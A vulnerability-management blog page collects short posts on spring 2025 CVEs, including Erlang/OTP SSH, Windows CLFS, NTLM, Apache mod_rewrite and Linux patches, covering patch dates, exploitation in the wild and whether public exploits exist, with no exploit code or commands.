About Remote Code Execution – Erlang/OTP (CVE-2025-32433) vulnerability

About Remote Code Execution – Erlang/OTP (CVE-2025-32433) vulnerability. Erlang is a programming language used to build massively scalable soft real-time systems with requirements for high availability. Used in telecom, banking, e-commerce, telephony, and messaging. OTP is a set of Erlang libraries and design principles providing middle-ware to develop these systems.

A message handling vulnerability in the Erlang/OTP SSH server allows an unauthenticated attacker to execute arbitrary code. The code runs in the context of the SSH daemon. If the daemon is running as root, this grants full control over the device.

The vendor bulletin was released on April 16. Updated versions: OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.

On April 17, a write-up and a PoC exploit (developed using AI) appeared on the Platform Security blog.

Cisco devices are affected – and likely not the only ones.

No signs of exploitation in the wild so far.

На русском

About Elevation of Privilege – Windows Common Log File System Driver (CVE-2025-29824) vulnerability

Leave a reply

About Elevation of Privilege – Windows Common Log File System Driver (CVE-2025-29824) vulnerability. The vulnerability from the April Microsoft Patch Tuesday allows an attacker operating under a regular user account to escalate their privileges to SYSTEM level.

According to Microsoft, the vulnerability was exploited in attacks against organizations in the U.S., Venezuela, Spain, and Saudi Arabia. The exploit was embedded in the PipeMagic malware used by the Storm-2460 group to deploy ransomware.

On May 7, Symantec reported technical details about another exploit for the vulnerability, used by Balloonfly group (associated with the Play ransomware) in an attack on a U.S. organization prior to April 8.

Are there public exploits? According to BDU FSTEC — yes. NVD also lists “exploit links”, but they point to detection and mitigation scripts. No mentions yet in exploit packs or on GitHub.

На русском

About Spoofing – Windows NTLM (CVE-2025-24054) vulnerability

Leave a reply

About Spoofing – Windows NTLM (CVE-2025-24054) vulnerability. It was patched in the March Microsoft Patch Tuesday. VM vendors didn’t mention this vulnerability in their reviews; it was only known to be exploited via user interaction with a malicious file.

A month later, on April 16, Check Point published a blog post with technical details, revealing that the vulnerability is exploited using specially crafted files…

Wait a minute — there was a trending vulnerability in March MSPT: CVE-2025-24071, related to the same files. Turns out, it’s THE SAME vulnerability. Check Point reports: “Microsoft had initially assigned the vulnerability the CVE identifier CVE-2025-24071, but it has since been updated to CVE-2025-24054“. What a mess. Technical details in the previous post.

Since March 19, Check Point has tracked about 11 campaigns exploiting this vulnerability to collect NTLMv2-SSP hashes.

На русском

About Remote Code Execution & Arbitrary File Reading – Apache HTTP Server (CVE-2024-38475) vulnerability

Leave a reply

About Remote Code Execution & Arbitrary File Reading – Apache HTTP Server (CVE-2024-38475) vulnerability. Improper escaping of output in mod_rewrite module leads to remote code execution or arbitrary file reading. Successful exploitation does not require authentication.

Apache HTTP Server 2.4.60, which includes a fix for this vulnerability, was released on July 1, 2024. Orange Tsai (DEVCORE) published technical details and BH2024 slides on the vulnerability on August 9, 2024. A PoC exploit has been on GitHub since August 18, 2024.

On April 29, 2025, it was disclosed that CVE-2024-38475 is actively exploited to compromise SonicWall SMA gateways. WatchTowr Labs explains how the vulnerability exposes the SQLite file with active session tokens. On May 1, the vulnerability was added to the CISA KEV.

Naturally, this vulnerability could potentially affect far more than just SonicWall appliances.

На русском

April Linux Patch Wednesday

Leave a reply

April Linux Patch Wednesday. Total vulnerabilities: 251. 164 in the Linux Kernel. No vulnerabilities show signs of being exploited in the wild. There are 7 vulnerabilities that appear to have publicly available exploits.

For 2 vulnerabilities, exploit code with detailed explanation is available on GitHub. Both were first patched in RedOS packages:

SQL injection – Exim (CVE-2025-26794)
Code Injection – MariaDB (CVE-2023-39593)

For the Memory Corruption – Mozilla Firefox (CVE-2025-3028), the NVD states the exploit code is in Mozilla’s bug tracker, but access is restricted.

BDU FSTEC reports public exploits for 4 vulnerabilities:

Information Disclosure – GLPI (CVE-2025-21626)
Security Feature Bypass – GLPI (CVE-2025-23024)
Denial of Service / Remote Code Execution – Perl (CVE-2024-56406)
Memory Corruption – Libsoup (CVE-2025-32050)

Full Vulristics report

На русском

About Elevation of Privilege – Windows Process Activation (CVE-2025-21204) vulnerability

Leave a reply

About Elevation of Privilege – Windows Process Activation (CVE-2025-21204) vulnerability. This vulnerability from the April Microsoft Patch Tuesday was not highlighted by VM vendors in their reviews. It affects the Windows Update Stack component and is related to improper link resolution before file access (CWE-59).

On April 14, researcher Elli Shlomo (CYBERDOM) published a write-up and exploit code to gain SYSTEM privileges. On April 27, after reports that the exploit didn’t work, he removed it and promised to revise it. Exploitability remains unclear.

On April 22, researcher Kevin Beaumont reported that the fix for this vulnerability, involving the creation of the folder, introduces a new denial-of-service vulnerability. It allows non-admin users to block the installation of Windows security updates. Microsoft responded that they don’t plan to fix it promptly. For now, it’s recommended to monitor for malicious activity.

На русском

April “In the Trend of VM” (#14): vulnerabilities in Microsoft Windows, VMware products, Kubernetes, and Apache Tomcat

Leave a reply

April “In the Trend of VM” (#14): vulnerabilities in Microsoft Windows, VMware products, Kubernetes, and Apache Tomcat. We decided to pause recording new videos, so for now only text.

Post on Habr (rus)
Digest on the PT website (rus)

A total of 11 trending vulnerabilities:

Elevation of Privilege – Windows Cloud Files Mini Filter Driver (CVE-2024-30085)
Spoofing – Windows File Explorer (CVE-2025-24071)
Four Windows vulnerabilities from March Microsoft Patch Tuesday were exploited in the wild (CVE-2025-24985, CVE-2025-24993, CVE-2025-26633, CVE-2025-24983)
Three VMware “ESXicape” Vulnerabilities (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226)
Remote Code Execution – Apache Tomcat (CVE-2025-24813)
Remote Code Execution – Kubernetes (CVE-2025-1974)

На русском

This is my personal blog. The opinions expressed here are my own and not of my employer. All product names, logos, and brands are property of their respective owners. All company, product and service names used here for identification purposes only. Use of these names, logos, and brands does not imply endorsement. You can freely use materials of this site, but it would be nice if you place a link on https://avleonov.com and send message about it at me@avleonov.com or contact me any other way.

Alexander V. Leonov

Vulnerability Management and more

About Remote Code Execution – Erlang/OTP (CVE-2025-32433) vulnerability

About Elevation of Privilege – Windows Common Log File System Driver (CVE-2025-29824) vulnerability

About Spoofing – Windows NTLM (CVE-2025-24054) vulnerability

About Remote Code Execution & Arbitrary File Reading – Apache HTTP Server (CVE-2024-38475) vulnerability

April Linux Patch Wednesday

About Elevation of Privilege – Windows Process Activation (CVE-2025-21204) vulnerability

April “In the Trend of VM” (#14): vulnerabilities in Microsoft Windows, VMware products, Kubernetes, and Apache Tomcat